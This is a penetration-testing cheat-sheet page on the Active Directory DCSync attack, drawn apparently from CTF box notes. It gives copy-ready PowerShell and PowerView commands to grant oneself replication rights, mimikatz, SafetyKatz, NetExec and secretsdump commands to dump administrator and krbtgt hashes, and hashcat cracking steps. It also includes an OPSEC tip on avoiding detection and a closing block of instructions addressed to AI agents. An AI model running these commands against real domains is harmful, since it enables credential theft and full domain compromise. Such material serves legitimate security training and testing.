# DCSync In Active Directory environments, multiple Domain Controllers (DCs) replicate data using the Directory Replication Service Remote Protocol (DRSR). The DCSync technique abuses this by **impersonating a DC and requesting user credential data**—essentially pulling `ntds.dit` contents over the network without code execution on a real DC. Critically, DCs do not authenticate the source of the replication request, only that the caller’s SID has the necessary replication privileges. To perform DCSync, an attacker must control an account with the following rights: `Replicating Directory Changes`, `Replicating Directory Changes All`, and sometimes `Replication-Get-Changes-In-Filtered-Set`. These are assigned by default to Domain Admins, Enterprise Admins, and built-in Administrators. However, if you have [`WriteDACL`](https://x7331.gitbook.io/boxes/tl-dr/active-directory/permissions/writedacl) over a privileged account, you can delegate these rights yourself. Notably, the [Exchange Windows Permissions](https://x7331.gitbook.io/boxes/tl-dr/active-directory/groups/exchange-windows-permissions) group often has DCSync rights in enterprise environments. For an example of levearing `WriteDACL` to perform DCSync see [Forest](https://x7331.gitbook.io/boxes/boxes/easy/forest). ## Tools {% hint style="warning" %} **OPSEC**: Performing a DCSync with `DC$` will typically fly under the radar. {% endhint %} {% tabs %} {% tab title="Windows" %} We can enumerate permissions using an elevated CMD or PS session. ```powershell # Command Prompt dsacls "DC=domain,DC=local" # PowerShell Get-DomainObjectAcl -Identity -Domain domain.local -ResolveGUIDs ``` We can assign DCSync rights manually or automatically using [PowerView](https://x7331.gitbook.io/boxes/tl-dr/active-directory/ad-tools/powerview) or `DCSync.py`. > *The manual way is explained* [*here*](https://github.com/gdedrouas/Exchange-AD-Privesc/blob/master/DomainObject/DomainObject.md)*.* {% code overflow="wrap" %} ```powershell # Manually $acl = get-acl "ad:DC=domain,DC=local" $id = [Security.Principal.WindowsIdentity]::GetCurrent() $user = Get-ADUser -Identity $id.User $sid = new-object System.Security.Principal.SecurityIdentifier $user.SID # rightsGuid for the extended right Ds-Replication-Get-Changes-All $objectguid = new-object Guid 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 $identity = [System.Security.Principal.IdentityReference] $sid $adRights = [System.DirectoryServices.ActiveDirectoryRights] "ExtendedRight" $type = [System.Security.AccessControl.AccessControlType] "Allow" $inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "None" $ace = new-object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType $acl.AddAccessRule($ace) # rightsGuid for the extended right Ds-Replication-Get-Changes $objectguid = new-object Guid 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 $ace = new-object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType $acl.AddAccessRule($ace) Set-acl -aclobject $acl "ad:DC=domain,DC=local" # PowerView Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity -Rights DCSync ``` {% endcode %} Once the rights have been assigned, we can perform the attack with [`mimikatz`](https://x7331.gitbook.io/boxes/tl-dr/active-directory/ad-tools/mimikatz). ```powershell # Mimikatz (PS script) Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\administrator"' # Mimikatz (binary) mimikatz # lsadump::dcsync /domain:DOMAIN.LOCAL /user:administrator ``` Finally, we can crack the hash using [`hashcat`](https://x7331.gitbook.io/boxes/tools/passwords/hashcat) on our attacking machine. {% code overflow="wrap" %} ```bash hashcat -m 1000 hashes.dcsync rockyou.txt \ -r /usr/share/hashcat/rules/best64.rule --force ``` {% endcode %} {% endtab %} {% tab title="Linux" %} We can assign DCSync rights using `DCSync.py`. {% code overflow="wrap" %} ```bash # DCSync.py DCSync.py -dc domain.local -t 'CN=,CN=Users,DC=domain,DC=local' 'domain.local\:' ``` {% endcode %} We can also perform the attack with [`NetExec`](#netexec) or [Impacket](https://x7331.gitbook.io/boxes/tl-dr/active-directory/ad-tools/impacket)'s `secretsdump` script. ```bash # NetExec nxc smb 10.10.10.161 -u '' -p '' --ntds --user administrator # Impacket's secretsdump impacket-secretsdump htb.local/hacker@10.10.10.161 -just-dc-user administrator ``` > *For an example of a DCSync attack using `DCSync.py` and `secretsdump.py` see* [*here*](https://x7331.gitbook.io/boxes/boxes/boxes/easy/active#eop-via-kerberoasting)*. For an example of a DCSync attack using NetExec see* [*here*](https://x7331.gitbook.io/boxes/boxes/boxes/easy/sauna#dcsync-attack)*.* Finally, we can crack the hash using [`hashcat`](https://x7331.gitbook.io/boxes/tools/passwords/hashcat) on our attacking machine. {% code overflow="wrap" %} ```bash hashcat -m 1000 hashes.dcsync rockyou.txt \ -r /usr/share/hashcat/rules/best64.rule --force ``` {% endcode %} {% endtab %} {% tab title="SafetyKatz" %} SafetyKatz can be used to perform a DCSync attack: ```powershell .\SafetyKatz.exe "privilege::debug" "lsadump::dcsync /user:dcorp\ktbtgt" "exit" ``` {% endtab %} {% endtabs %} ## Resources * An in-depth article about DCSync from Altered Security ([article](https://www.alteredsecurity.com/post/a-primer-on-dcsync-attack-and-detection)) * What `impacket-secretsdump` does behind the scenes ([video](https://www.youtube.com/watch?v=QfyZQDyeXjQ)) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://x7331.gitbook.io/boxes/tl-dr/active-directory/attacks/dcsync.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.